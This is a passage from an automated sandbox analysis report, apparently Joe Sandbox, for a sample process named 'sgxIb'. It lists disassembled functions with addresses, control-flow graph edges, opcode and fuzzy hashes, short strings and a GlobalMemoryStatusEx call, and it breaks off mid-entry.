                                              control_flow_graph 1168 2ceed70-2ceed8b 1169 2ceed8d-2ceedb4 1168->1169 1170 2ceedb5-2ceedcb 1168->1170 1191 2ceedcd call 2ceee58 1170->1191 1192 2ceedcd call 2ceed70 1170->1192 1173 2ceedd2-2ceedd4 1174 2ceedda-2ceee39 1173->1174 1175 2ceedd6-2ceedd9 1173->1175 1182 2ceee3f-2ceeecc GlobalMemoryStatusEx 1174->1182 1183 2ceee3b-2ceee3e 1174->1183 1187 2ceeece-2ceeed4 1182->1187 1188 2ceeed5-2ceeefd 1182->1188 1187->1188 1191->1173 1192->1173
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2252684836.0000000002CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02CE0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_2ce0000_sgxIb.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 6cfb60e5e0a71e814d0ab07a4f8172ad84e759971da34d8f6f8329b1ef23d56e
                                              • Instruction ID: 245330bc731451692ddedc58c86728925ec76cfe221eb7fc5c1d067085d6b517
                                              • Opcode Fuzzy Hash: 6cfb60e5e0a71e814d0ab07a4f8172ad84e759971da34d8f6f8329b1ef23d56e
                                              • Instruction Fuzzy Hash: B4410472D0075A8BCB14EF79D8443DEBBF5EF89310F148A6AD416A7280DB789841CBE0
                                              Function 02CEEE58 Relevance: 1.6, APIs: 1, Instructions: 52COMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 1193 2ceee58-2ceeecc GlobalMemoryStatusEx 1195 2ceeece-2ceeed4 1193->1195 1196 2ceeed5-2ceeefd 1193->1196 1195->1196
                                              APIs
                                              • GlobalMemoryStatusEx.KERNELBASE ref: 02CEEEBF
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2252684836.0000000002CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02CE0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_2ce0000_sgxIb.jbxd
                                              Similarity
                                              • API ID: GlobalMemoryStatus
                                              • String ID:
                                              • API String ID: 1890195054-0
                                              • Opcode ID: b51d842147ca9131b3edb92630f95250ff96b1e71ae59bdbd5634dfc695f9aaa
                                              • Instruction ID: 5bde4f5d82b45e706fc6f4f575854bc97bb2efd8d189202546463b892e265112
                                              • Opcode Fuzzy Hash: b51d842147ca9131b3edb92630f95250ff96b1e71ae59bdbd5634dfc695f9aaa
                                              • Instruction Fuzzy Hash: 9811EFB1C0065A9BCB10DFAAC544A9EFBF4AF48320F15856AD918A7240D778A944CFA5
                                              Function 06BDDBE5 Relevance: 1.4, Strings: 1, Instructions: 124COMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 1264 6bddbe5-6bddbe8 1265 6bddbf8-6bddc0f 1264->1265 1266 6bddbea-6bddbf4 1264->1266 1267 6bddc11-6bddc14 1265->1267 1266->1265 1268 6bddc16 1267->1268 1269 6bddc23-6bddc26 1267->1269 1272 6bddc1c-6bddc1e 1268->1272 1270 6bddc59-6bddc5c 1269->1270 1271 6bddc28-6bddc54 1269->1271 1273 6bddc7f-6bddc81 1270->1273 1274 6bddc5e-6bddc7a 1270->1274 1271->1270 1272->1269 1275 6bddc88-6bddc8b 1273->1275 1276 6bddc83 1273->1276 1274->1273 1275->1267 1278 6bddc8d-6bddc9c 1275->1278 1276->1275 1281 6bdde21-6bdde4b 1278->1281 1282 6bddca2-6bddcdb 1278->1282 1285 6bdde4c 1281->1285 1289 6bddcdd-6bddce7 1282->1289 1290 6bddd29-6bddd4d 1282->1290 1285->1285 1294 6bddcff-6bddd27 1289->1294 1295 6bddce9-6bddcef 1289->1295 1296 6bddd4f 1290->1296 1297 6bddd57-6bdde1b 1290->1297 1294->1289 1294->1290 1298 6bddcf1 1295->1298 1299 6bddcf3-6bddcf5 1295->1299 1296->1297 1297->1281 1297->1282 1298->1294 1299->1294
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2261541830.0000000006BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BD0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_6bd0000_sgxIb.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: PH]q
                                              • API String ID: 0-3168235125
                                              • Opcode ID: fb05d33c712de952fad5b16d9d051255eec5a0fb247a1b34ec408d2ac17a544c
                                              • Instruction ID: b2bf8f69cf39b17771f4946b177e6b1d05ffc4fad901db3fefafbd7e202d6ab6
                                              • Opcode Fuzzy Hash: fb05d33c712de952fad5b16d9d051255eec5a0fb247a1b34ec408d2ac17a544c
                                              • Instruction Fuzzy Hash: 2B41BEB0E0060A9FDF64DFA9D85469EBBB2FF85300F144569E845EB354EBB0D806CB81
                                              Function 06BD21D0 Relevance: 1.4, Strings: 1, Instructions: 105COMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 1305 6bd21d0-6bd21eb 1306 6bd21ed-6bd21f0 1305->1306 1307 6bd2213-6bd2215 1306->1307 1308 6bd21f2-6bd220e 1306->1308 1309 6bd221c-6bd221f 1307->1309 1310 6bd2217 1307->1310 1308->1307 1309->1306 1312 6bd2221-6bd2247 1309->1312 1310->1309 1317 6bd224e-6bd227c 1312->1317 1322 6bd227e-6bd2288 1317->1322 1323 6bd22f3-6bd2317 1317->1323 1326 6bd228a-6bd2290 1322->1326 1327 6bd22a0-6bd22f1 1322->1327 1331 6bd2319 1323->1331 1332 6bd2321 1323->1332 1329 6bd2294-6bd2296 1326->1329 1330 6bd2292 1326->1330 1327->1322 1327->1323 1329->1327 1330->1327 1331->1332
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2261541830.0000000006BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BD0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_6bd0000_sgxIb.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: PH]q
                                              • API String ID: 0-3168235125
                                              • Opcode ID: e2f5a5e598f689cb2ef8dcb2a0cb89b52d6a884e863109da8322b6babd670bc7
                                              • Instruction ID: b3a57fddbf28755e3c381c145d305847f9d27dfe450cd5764e29e7b2742af97f
                                              • Opcode Fuzzy Hash: e2f5a5e598f689cb2ef8dcb2a0cb89b52d6a884e863109da8322b6babd670bc7
                                              • Instruction Fuzzy Hash: A331FEB0B102458FDB59AB74D52066E3AA7EFC9204F104478E506DB399EE35DE02CB95
                                              Function 06BD83E8 Relevance: 1.3, Strings: 1, Instructions: 40COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2261541830.0000000006BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BD0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_6bd0000_sgxIb.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: $]q
                                              • API String ID: 0-1007455737
                                              • Opcode ID: fe8bd4d400ca2ab063c5d7608c4787b775a76bdbe94190f05903cf92c33ebd63
                                              • Instruction ID: 4621c2229d40a221d314a9004af507897cd92ec84c4beca5818258da74560aea
                                              • Opcode Fuzzy Hash: fe8bd4d400ca2ab063c5d7608c4787b775a76bdbe94190f05903cf92c33ebd63
                                              • Instruction Fuzzy Hash: 7EF0C2B1B041158FDF689E98F9A027977ADFB40216F1444F6C908CF264E7B1D905CF91
                                              Function 06BD4B69 Relevance: 1.3, Strings: 1, Instructions: 25COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2261541830.0000000006BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BD0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_6bd0000_sgxIb.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: \Obq
                                              • API String ID: 0-2878401908
                                              • Opcode ID: 718c7d1ffb2cd611b959a3013c28fbf7fcb9de89ec2b40365156b2dc31717d0f
                                              • Instruction ID: 3a703f4976200f1447928d8f879117a64ba92070e4542528c0d6512813048d25
                                              • Opcode Fuzzy Hash: 718c7d1ffb2cd611b959a3013c28fbf7fcb9de89ec2b40365156b2dc31717d0f
                                              • Instruction Fuzzy Hash: CCF0DAB4E50129DFDB14DF95E958BAEBBF2FF88600F200559E002A7294CBB01C01CF80
                                              Function 06BDC2B0 Relevance: .6, Instructions: 642COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2261541830.0000000006BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BD0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_6bd0000_sgxIb.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: d6bfad4a9cf25d787b1cac3d10734945075d409e742ed8d4a80192b7aa3bb354
                                              • Instruction ID: cc5e01894908a640d1539ae204e8fcfca49909b7726450d6b51d62e99e746b12
                                              • Opcode Fuzzy Hash: d6bfad4a9cf25d787b1cac3d10734945075d409e742ed8d4a80192b7aa3bb354
                                              • Instruction Fuzzy Hash: E832B174B001099FDF54DFA8D990AADBBBAFB84314F108465D405EB395EB35DC42CB91
                                              Function 06BDB3E7 Relevance: .6, Instructions: 558COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2261541830.0000000006BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BD0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_6bd0000_sgxIb.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: b2c88df7a713290f73cb6bec121de9db7065bc969adb2764a99d4a34d860fb93
                                              • Instruction ID: c8882bf97e3e6ce7057e529d5df55948a610a59cbb730c7465d8b32610198869
                                              • Opcode Fuzzy Hash: b2c88df7a713290f73cb6bec121de9db7065bc969adb2764a99d4a34d860fb93
                                              • Instruction Fuzzy Hash: 0C225EF0E002099FDF64DB68D4907ADB7B6EB45310F2598AAE409EF395EA34DC81CB51
                                              Function 06BD6308 Relevance: .2, Instructions: 229COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2261541830.0000000006BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BD0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_6bd0000_sgxIb.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: a6451a14efbb17088353222cc55c0fb7ef10f90a61e467cf2d1617cc3fe4bfa2
                                              • Instruction ID: f46c9289d861e1807fe9c069a1a3843c99f0e2a694ca2cf7c1c8ac69fc33a030
                                              • Opcode Fuzzy Hash: a6451a14efbb17088353222cc55c0fb7ef10f90a61e467cf2d1617cc3fe4bfa2
                                              • Instruction Fuzzy Hash: FA61A1B1F001214FDB64AA6EC88065FBADBEF94224F154479D80EDB364EE75ED0287D1
                                              Function 06BD43B9 Relevance: .2, Instructions: 222COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2261541830.0000000006BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BD0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_6bd0000_sgxIb.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 307e2e4deff22d04e042924e4116632a5b3fcc2dd64b1ec6728c2c01fae96413
                                              • Instruction ID: e602c44213467ec7d0e6c243e77aac890e68636584e44b9e04c39a4109b400a4
                                              • Opcode Fuzzy Hash: 307e2e4deff22d04e042924e4116632a5b3fcc2dd64b1ec6728c2c01fae96413
                                              • Instruction Fuzzy Hash: 5C815D74B0020A8FDF44DFA9D45469EB7F2EF85304F108469D50AEB395EB74DC468B92
                                              Function 06BD46D4 Relevance: .2, Instructions: 217COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2261541830.0000000006BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BD0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_6bd0000_sgxIb.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 3e15aec22bc1dc4392bc699c39e6fcac3e0a8e44ccf2cb4d195e302d3864769b
                                              • Instruction ID: 8e582f7a2424bf962e3998df1aeb5a0bd3e3fdb5f3956d7f6e68a7e5041d61d3
                                              • Opcode Fuzzy Hash: 3e15aec22bc1dc4392bc699c39e6fcac3e0a8e44ccf2cb4d195e302d3864769b
                                              • Instruction Fuzzy Hash: 7A915E70E002198FDF60DF68C890B9DB7B1FF89300F208599D54DAB255EB70AA86CF91
                                              Function 06BD46E8 Relevance: .2, Instructions: 210COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2261541830.0000000006BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BD0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_6bd0000_sgxIb.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 95d7641f45415972667f20ab3e180c860e7bad57ff31cf47933ab3023f971a39
                                              • Instruction ID: 13589ce2a3819fd36624d5ef649c32c14436287bdb4772923bd58f8bc533bae6
                                              • Opcode Fuzzy Hash: 95d7641f45415972667f20ab3e180c860e7bad57ff31cf47933ab3023f971a39
                                              • Instruction Fuzzy Hash: 7D913E74E1021A8BDF60DF64C890B9DB7B1FF89300F208599D54DAB255EB70AA85CF91
                                              Function 06BDF039 Relevance: .2, Instructions: 204COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2261541830.0000000006BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BD0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_6bd0000_sgxIb.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 21bccd4eac69a73c38ba36dc29f5af12e64fcc0d4d872ad111d567dd6fe52a9f
                                              • Instruction ID: bfa9153f5e226ce8113e8f9f5d5d6b973409805bf8ceb95ac4b592ac9cb21681
                                              • Opcode Fuzzy Hash: 21bccd4eac69a73c38ba36dc29f5af12e64fcc0d4d872ad111d567dd6fe52a9f
                                              • Instruction Fuzzy Hash: F3713274A001099FCB54DFA9D990AADB7FAFF84304F148469D40AEB355EB30ED46CB51
                                              Function 06BDF048 Relevance: .2, Instructions: 201COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2261541830.0000000006BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BD0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_6bd0000_sgxIb.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: d685d0206a7dfd7b58c3560533c47edcf5679dd6a95d1897ffbeed661327a927
                                              • Instruction ID: 5183d564b13f738aca553e02766a34c23c312f999b2c0470c359622765200899
                                              • Opcode Fuzzy Hash: d685d0206a7dfd7b58c3560533c47edcf5679dd6a95d1897ffbeed661327a927
                                              • Instruction Fuzzy Hash: 7D714070A001099FCB54DFA9D990AADBBFAFF84304F148469D40AEB365EB30EC46CB51
                                              Function 06BDFCC9 Relevance: .2, Instructions: 176COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2261541830.0000000006BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BD0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_6bd0000_sgxIb.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: ea80275af6084ccc4d97019ba9c0eeef62dd9be10d9dd5d2df2a76d9e3b62aaa
                                              • Instruction ID: 712c26b9e59e21e96601f1c670afa25c8007c1eeb56b49e5310381c95ad498f5
                                              • Opcode Fuzzy Hash: ea80275af6084ccc4d97019ba9c0eeef62dd9be10d9dd5d2df2a76d9e3b62aaa
                                              • Instruction Fuzzy Hash: 935100B0E14105DFCF64AF78E4542ADBBBAFB84214F1088A9E11ADB251EB318855CB81
                                              Function 06BDFA78 Relevance: .2, Instructions: 168COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2261541830.0000000006BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BD0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_6bd0000_sgxIb.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 9cbef2a4a4b0deb6ec4a83d24e2ac1ed0c3ce3e66b9536a14074a71d178becc7
                                              • Instruction ID: f2103bd660670475765a61cfd4d34b67c02259caf43d060505f58cd197ccad1e
                                              • Opcode Fuzzy Hash: 9cbef2a4a4b0deb6ec4a83d24e2ac1ed0c3ce3e66b9536a14074a71d178becc7
                                              • Instruction Fuzzy Hash: 7551ECB0F102059FEF64567CD96473F365EEB89314F204866E40BCB3EAEA68CC458792
                                              Function 06BDFA88 Relevance: .2, Instructions: 163COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2261541830.0000000006BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BD0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_6bd0000_sgxIb.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: d1f4cf664f0527b9827d311af93ab3fb05af10d66df3d4b6d640a502c4286ffb
                                              • Instruction ID: 8a384951837bf16a0202525637eff489ce4c41cb125651566c96445c4c4d4643
                                              • Opcode Fuzzy Hash: d1f4cf664f0527b9827d311af93ab3fb05af10d66df3d4b6d640a502c4286ffb
                                              • Instruction Fuzzy Hash: CD51CBB0F102055FEF64666CD96473F365FEB89314F204865E40BCB3EAEA68CC458792
                                              Function 06BD5529 Relevance: .1, Instructions: 129COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2261541830.0000000006BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BD0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_6bd0000_sgxIb.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: b31e175463f048f5dce83d8c89df1ec2e40f3e8fbf6887ec35a5b71bb3fe021b
                                              • Instruction ID: e049d807a84330a870d0b0ca13ba52364e263aff05fa1952e7ba8f3629090f87
                                              • Opcode Fuzzy Hash: b31e175463f048f5dce83d8c89df1ec2e40f3e8fbf6887ec35a5b71bb3fe021b
                                              • Instruction Fuzzy Hash: 1C415FB2E006098FDF74CEA9D8C0AAFFBB6FB44310F10496AD255DB650E731E8458B91
                                              Function 06BD2080 Relevance: .1, Instructions: 98COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2261541830.0000000006BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BD0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_6bd0000_sgxIb.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 271064c491614f792dcfd1b24a3ff6575b4439b4e3306343506706df67f975da
                                              • Instruction ID: e018e5c195452727e752f99e61c6198e7f993125a20492169ac3595b1ceb49ac
                                              • Opcode Fuzzy Hash: 271064c491614f792dcfd1b24a3ff6575b4439b4e3306343506706df67f975da
                                              • Instruction Fuzzy Hash: 8C31DE70E002169FCB59DF64D89469EB7F2FF89300F10C569EA0AEB350EB31A906CB50
                                              Function 06BDDA98 Relevance: .1, Instructions: 97COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2261541830.0000000006BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BD0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_6bd0000_sgxIb.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: efb6a1e6c1658c85cb14ed7183583e111061025db4667793bbe17eb37020cca7
                                              • Instruction ID: 60d8b71d86c8adae43cd2ab2dcd4d1ee5bc3ec5ca82688a30cb7c909157fce21
                                              • Opcode Fuzzy Hash: efb6a1e6c1658c85cb14ed7183583e111061025db4667793bbe17eb37020cca7
                                              • Instruction Fuzzy Hash: 4F31E370E1070A8FCF65DFA8D49069EBBF6FF85304F108969D445AB254EBB0E846CB81
                                              Function 06BD2090 Relevance: .1, Instructions: 91COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2261541830.0000000006BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BD0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_6bd0000_sgxIb.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 7c5384a67ebbe4d6c0864765254b17b76040e7921d199228dc6fdf9416491932
                                              • Instruction ID: 6c852e82a4c375b099ba6d9cc086b4b5becf017938251347fea061ca656ea501
                                              • Opcode Fuzzy Hash: 7c5384a67ebbe4d6c0864765254b17b76040e7921d199228dc6fdf9416491932
                                              • Instruction Fuzzy Hash: 9B31AB74E0021A9FCB19DF65D85469EB7F2FF89300F10C529EA0AEB350EB71A946CB50
                                              Function 06BD3508 Relevance: .1, Instructions: 81COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2261541830.0000000006BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BD0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_6bd0000_sgxIb.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: d370ec12509d53581b3477937089e9d964d4b82bd487b7291e9178642b088ee4
                                              • Instruction ID: 20acc93b0ee35c9808ab53a0f59849f1ffdedc9d2ba128305d1ad167e0a84d93
                                              • Opcode Fuzzy Hash: d370ec12509d53581b3477937089e9d964d4b82bd487b7291e9178642b088ee4
                                              • Instruction Fuzzy Hash: 5921B0B1E052A45FCB55DB38C8605CEBBF5AF8A314F0840E7D042EF252EA34C945CBA2
                                              Function 06BD3FC1 Relevance: .1, Instructions: 79COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2261541830.0000000006BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BD0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_6bd0000_sgxIb.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 804b05f4edea9a6908d623493a2b1ffb9eb60dd4340e1ce3f860503cd4c3bee0
                                              • Instruction ID: a6090ee3a4d0e0c90e904af3b9779c8fee1ab5fb76e31141ccad16ef0a419c7a
                                              • Opcode Fuzzy Hash: 804b05f4edea9a6908d623493a2b1ffb9eb60dd4340e1ce3f860503cd4c3bee0
                                              • Instruction Fuzzy Hash: D72190B5F002199FDB54EF68D950AAFB7F5EB48310F008065E915EB380E775DD018BA1
                                              Function 06BD3FD0 Relevance: .1, Instructions: 78COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2261541830.0000000006BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BD0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_6bd0000_sgxIb.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 2637955563d37947d28a8c6dd64a04e41b8c732938956e30ae5c81ce61712a62
                                              • Instruction ID: 08c991d775f43e3a886a96c59cefcc719efea16cf53a79f40bf6702b0a0f1552
                                              • Opcode Fuzzy Hash: 2637955563d37947d28a8c6dd64a04e41b8c732938956e30ae5c81ce61712a62
                                              • Instruction Fuzzy Hash: 9B218CB5F002199FDB50DF69D990AAEBBF5EB48310F108066E905EB384E775D9018BA1
                                              Function 06BDB038 Relevance: .1, Instructions: 72COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2261541830.0000000006BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BD0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_6bd0000_sgxIb.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 74e051beb0ab4c5cb1e563185e296c659c7ea5bf478c4bdf7578d9964a230117
                                              • Instruction ID: f158865e62758412abf0b3048c96b820269d8257e9e97ec8a57cefa7c11e313b
                                              • Opcode Fuzzy Hash: 74e051beb0ab4c5cb1e563185e296c659c7ea5bf478c4bdf7578d9964a230117
                                              • Instruction Fuzzy Hash: 1B216FB1D1071E8BDF64CFA9C84069EBBB5FF85354F11896AD809EF250EBB09845CB81
                                              Function 06BDA420 Relevance: .1, Instructions: 71COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2261541830.0000000006BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BD0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_6bd0000_sgxIb.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 4cd1bfb75401896c8254bda8503cc6ceddea0d43f194aa751a5bfe95580476dd
                                              • Instruction ID: 2e99c52ec33d033c0f8069602a7f52af762c6026678d56c8cea294fb2253952c
                                              • Opcode Fuzzy Hash: 4cd1bfb75401896c8254bda8503cc6ceddea0d43f194aa751a5bfe95580476dd
                                              • Instruction Fuzzy Hash: BE2138B1F001114FCBA5DA7CE85476E77E5EB86718F1044BAE50ECB395EE24CD068781
                                              Function 06BD6E30 Relevance: .1, Instructions: 68COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2261541830.0000000006BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BD0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_6bd0000_sgxIb.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: f6e159d1ef3f30bb1b40dd4f86359c1cf03e8fd40e28a6da3d9faffd4d7a8d35
                                              • Instruction ID: a022b19c711b0900848cfbd9b8eecf00e5e5e0aba10411e7bb29229937c8a269
                                              • Opcode Fuzzy Hash: f6e159d1ef3f30bb1b40dd4f86359c1cf03e8fd40e28a6da3d9faffd4d7a8d35
                                              • Instruction Fuzzy Hash: 1A21DC70B200199BCF84EA69E8646AEB7B6EB84314F108579D409EB344EB30ED428B81
                                              Function 06BD4318 Relevance: .1, Instructions: 59COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2261541830.0000000006BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BD0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_6bd0000_sgxIb.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 52db7d40affb63273d24fa2f32a41d67991bb1ff4088b55be810e5d297cdb867
                                              • Instruction ID: 8d9e330d739d173cd86f225da2e21a7b88ee39a8336e86f107dfa640a60b3bb9
                                              • Opcode Fuzzy Hash: 52db7d40affb63273d24fa2f32a41d67991bb1ff4088b55be810e5d297cdb867
                                              • Instruction Fuzzy Hash: D00122B5B101110BCB659A3CD81472EB7EADBC6620F10847AE14ECB3A5E960CC024391
                                              Function 06BD40E0 Relevance: .1, Instructions: 59COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2261541830.0000000006BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BD0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_6bd0000_sgxIb.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 8681db92fd4840887cdc86895d5daad9ae7e41200049c243f962894b5d333b6a
                                              • Instruction ID: bd0ac6ae940eeef7cf473812dbe3dc050f4df1f389797c6354a1774b5f3669d5
                                              • Opcode Fuzzy Hash: 8681db92fd4840887cdc86895d5daad9ae7e41200049c243f962894b5d333b6a
                                              • Instruction Fuzzy Hash: 8C118E36B001284BDB54E668DC146AE77FAEBC8210F058579C50AEB340EE75DC068BE1
                                              Function 06BD40D1 Relevance: .1, Instructions: 54COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2261541830.0000000006BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BD0000, based on PE: false
                                              Joe Sandbox IDA Plugin
